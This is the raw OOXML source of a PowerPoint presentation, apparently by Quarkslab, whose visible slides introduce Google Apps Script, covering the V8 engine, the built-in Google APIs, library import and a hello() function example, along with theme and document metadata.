          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3267515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48FD14D8-8908-6C79-0428-A03657532529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563639" y="1129607"/>
            <a:ext cx="4608848" cy="2913756"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Apps Script supports V8 JavaScript engine (Rhino is note used anymore)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>A lot of classes and methods are available</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Google Apps Script has built-in support for many Google APIs including Google Drive, Google Sheets, Google Calendar, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Import library feature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> Google Apps Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{870D98D9-8387-CAA5-51E3-1C598771C404}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5355455" y="1129607"/>
            <a:ext cx="2509062" cy="3002451"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC27B94A-BF3C-F793-CA8E-A91382D44B08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6609986" y="3399946"/>
            <a:ext cx="1970375" cy="1464224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFA086C3-F093-8F05-0352-077D70A3FD6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="431528" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>7/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="585030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C27BB5-1701-6438-C5DF-406E7447D01F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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PlaceHolder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{089F3838-1844-5770-E599-207DF64E1F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335183" y="1877093"/>
            <a:ext cx="8346600" cy="1165668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="4500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751"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>How to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>deploy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>Google Apps Script?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="800" b="1" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphique 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F19B0AC-A107-5AA0-6CC0-645E70E72B12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7684560" y="4620960"/>
            <a:ext cx="1271880" cy="255600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3578664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7DAF00-B3C7-89D7-B620-995247399435}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="60083" y="100824"/>
            <a:ext cx="4021414" cy="530223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"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fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Hello() function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A048749-000A-EB44-20D9-431A6459125E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563639" y="1129606"/>
            <a:ext cx="7164825" cy="912553"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="90000"/>
                    <a:lumOff val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://script.google.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="90000"/>
                  <a:lumOff val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>gs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>hello()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>function:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="90000"/>
                  <a:lumOff val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE4A1E15-5CB3-1C50-114F-9D254CF95E9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="431528" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>9/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9607FA34-03D3-39ED-D148-91D184ACB0C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3302919" y="1585882"/>
            <a:ext cx="4744089" cy="3393442"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29744468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12214D"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="047FDC"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="065C9D"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="12214D"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="12214D"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="12214D"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="12214D"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="D7B5C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12214D"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="047FDC"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="065C9D"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="12214D"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="12214D"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="12214D"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="12214D"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="D7B5C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12214D"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="047FDC"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="065C9D"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="12214D"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="12214D"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="12214D"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="12214D"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="D7B5C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d0790b0-6afc-4a8e-b367-84ec5d8ef037">
      <UserInfo>
        <DisplayName>Mathieu Robert</DisplayName>
        <AccountId>10</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Guillaume Valadon</DisplayName>
        <AccountId>11</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Jean-Baptiste Van Puyvelde</DisplayName>
        <AccountId>16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5885B5502419844AB01D2CEC3E4955B" ma:contentTypeVersion="4" ma:contentTypeDescription="Crée un document." ma:contentTypeScope="" ma:versionID="5f089e5950294293793ad4e6a27efe8c">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="8eb84bca-5df9-49bc-a576-31ffb51cf4d0" xmlns:ns3="0d0790b0-6afc-4a8e-b367-84ec5d8ef037" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="58882856c71acd5519b8202863d328cb" ns2:_="" ns3:_="">
    <xsd:import namespace="8eb84bca-5df9-49bc-a576-31ffb51cf4d0"/>
    <xsd:import namespace="0d0790b0-6afc-4a8e-b367-84ec5d8ef03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b84bca-5df9-49bc-a576-31ffb51cf4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d0790b0-6afc-4a8e-b367-84ec5d8ef037"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DBF19F-7DF6-4340-82E9-46ABE6DA4C9E}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6BEC480D-581B-4A8D-98AE-1F27D8DB3192}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="0d0790b0-6afc-4a8e-b367-84ec5d8ef037"/>
    <ds:schemaRef ds:uri="437646ea-a709-4bd5-ad6e-2ed0a1ed86f9"/>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67023CF-EC32-4CF9-AFF0-5AFD5079ACDB}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="0d0790b0-6afc-4a8e-b367-84ec5d8ef037"/>
    <ds:schemaRef ds:uri="8eb84bca-5df9-49bc-a576-31ffb51cf4d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32566</TotalTime>
  <Words>3308</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Affichage à l'écran (16:9)</PresentationFormat>
  <Paragraphs>467</Paragraphs>
  <Slides>51</Slides>
  <Notes>16</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>2</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>Polices utilisées</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>6</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Thème</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Titres des diapositives</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>51</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="59" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>Proxima Nova</vt:lpstr>
      <vt:lpstr>Proxima Nova Rg</vt:lpstr>
      <vt:lpstr>Roboto Mono</vt:lpstr>
      <vt:lpstr>Times New Roman</vt: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Quarkslab</dc:title>
  <dc:subject/>
  <dc:creator>Nicknam3</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>Nicolas Kovacs</cp:lastModifiedBy>
  <cp:revision>219</cp:revision>
  <cp:lastPrinted>2019-07-10T09:45:24Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-06-07T17:41:21Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-13T15:04:15Z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6</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="PresentationFormat">
    <vt:lpwstr>On-screen Show (16:9)</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Slides">
    <vt:i4>20</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="ContentTypeId">
    <vt:lpwstr>0x01010025885B5502419844AB01D2CEC3E4955B</vt:lpwstr>
  </property>
</Properties>
</file>